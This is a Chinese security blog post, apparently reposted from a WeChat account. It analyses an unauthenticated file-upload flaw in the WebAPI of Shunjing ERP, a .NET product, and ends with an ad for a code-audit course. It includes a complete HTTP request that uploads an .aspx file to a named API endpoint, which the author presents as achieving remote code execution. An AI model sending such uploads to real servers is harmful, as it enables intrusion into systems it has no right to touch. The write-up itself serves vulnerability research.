某NET代码审计前台RCE漏洞分析

admin 2025年4月2日22:45:13评论11 views字数 1365阅读4分33秒阅读模式

免责申明

本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。

一、前言

某NET代码审计前台RCE漏洞分析

某位师傅给我发了一个顺景ERP的代码,并且跟我说是最新版本的,我们来看一看。

某NET代码审计前台RCE漏洞分析
某NET代码审计前台RCE漏洞分析

这是顺景ERP的目录结构,我们肯定是进行查看WEBAPI这个目录,一般API节课出现安全问题的比较多。

某NET代码审计前台RCE漏洞分析

那么把bin目录下的文件载入进来,我们开始吧!

二、路由分析

某NET代码审计前台RCE漏洞分析

查看全局文件,其实这里可以看到是存在WebAPI当中的WebApiAppliaction当中的。

某NET代码审计前台RCE漏洞分析

可以看到这个方法就是启动方法,其中的代码21行当中跟入这个类当中。

某NET代码审计前台RCE漏洞分析

我们得到了对应的路由是如何进行传递的,看是跟入Controller。

三、漏洞分析

在Controller当中

某NET代码审计前台RCE漏洞分析

可以看到存在一个RequestAuthorize的注解一样的东西,这个就是鉴权,我们寻找没有这个注解一类的东西的方法处。

某NET代码审计前台RCE漏洞分析

在上面可以看到一个方法可以直接进行文件上传,并且没有对应的检测,可以直接上传aspx文件。

四、漏洞验证

某NET代码审计前台RCE漏洞分析

请求包如下:

POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: xxxx
Content-Length: 155
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Origin: xxxxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9C4zXhY2gc6dn9QX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary9C4zXhY2gc6dn9QX
Content-Disposition: form-data; name="file"; filename="1.aspx"

1
------WebKitFormBoundary9C4zXhY2gc6dn9QX--
成功RCE,但是自己经过搜索发现是nday当即质问了这个臭小子
某NET代码审计前台RCE漏洞分析
五、代码审计广告
代码审计第四期马上开始,富含PHP、JAVA、NET代码审计,顺带APP、小程序、WEB当中参数逆向以及JAVA工具二开与SRC案例讲解,其中以及投入了某OA最新版本前台rce案例讲解,想学习速速报名了。

详细介绍

知名小朋友,公众号:进击安全想学代码审计的师傅进来了!
某NET代码审计前台RCE漏洞分析

原文始发于微信公众号(进击安全):某NET代码审计前台RCE--漏洞分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月2日22:45:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某NET代码审计前台RCE漏洞分析https://cn-sec.com/archives/3893975.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息